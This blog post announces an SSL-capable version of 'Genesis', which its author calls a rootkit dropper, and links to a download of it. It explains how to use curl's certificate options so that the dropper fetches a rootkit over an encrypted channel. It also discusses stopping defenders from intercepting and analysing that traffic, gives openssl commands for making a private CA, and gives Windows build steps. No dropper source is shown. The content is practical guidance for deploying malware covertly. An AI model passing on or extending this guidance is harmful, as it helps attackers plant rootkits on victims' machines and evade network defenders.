Genesis – Generic Rootkit Dropper with SSL Support

Quick update to add SSL support to Genesis, my (very) generic rootkit dropper which you can download at http://leetsys.com/programs/genesis/genesis-ssl.zip.  This allows us to download our rootkit over an encrypted tunnel.  Genesis still uses the curl library, however I chose not to compile it statically in this case.  If you wanted to compile this statically you’d have to include the openssl libary which means the binary would be HUGE.  So, rather than having both versions of Genesis statically compiled you would just have to choose which version is better suited for the task.

Curl gives us a few variables worth configuring for a rootkit dropper.

CURLOPT_SSL_VERIFYPEER – If configured the remote certificate will be verified as being signed by a ‘valid CA’, that is NOT self signed.

CURLOPT_SSL_VERIFYHOST – If configured it will only accept the certificate if it matches the hostname that we are connecting to.

CURLOPT_CAINFO – This variable allows you to configure a CA certificate that the server certificate must be signed by.  This option is particularly helpful for our purposes of downloading a rootkit, or other sensitive file.  If the server’s certificate was not signed by our CA certificate the file will not be downloaded, this would prevent a potential SSL man in the middle.  To use this option you must have the CURLOPT_SSL_VERIFYPEER option enabled.

Unfortunately the function takes a file name and not a file handle so there’s a slight gap for us here.  If someone wanted to intercept the traffic to analyze our network communications they could simply replace the certificate with one they generated.   It would be much better to just include the contents of the certificate in our binary to avoid any potential abuse, but there are ways that we can guarantee we are using the correct certificate.  For example we could just take an md5 of the certificate and include this in our binary.  We then hash the certificate file and then verify the certificate has not been modified before passing it to the curl function. I’ll probably add this in a future release.

The CA certificate must be in PEM format and can be generated with the following commands:

openssl req -new -x509 -extensions v3_ca -keyout ca.key  -out ca.crt -days 3650

openssl genrsa -des3 -out server.key 1024
openssl req -new -key server.key -out server.csr

openssl x509 -req -days 365 -in server.csr -CA ca.crt -CAkey ca.key -set_serial 01 -out server.crt

I included the curl and openssl libraries in the archive but if you need to compile them you can follow these simple instructions.

Download openssl binary distribution from http://www.slproweb.com/products/Win32OpenSSL.html
I used Win32 OpenSSL v1.0.0f at http://www.slproweb.com/download/Win32OpenSSL-1_0_0f.exe
Alternatively you could build from source, but all the work is done for you already.

Set correct opensssl variables in the Makefile.m32 file in both the lib and src directories, for the exact settings that worked for me you can view the notes file included in the archive.

run mingw32-make mingw32-ssl from curl directory.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: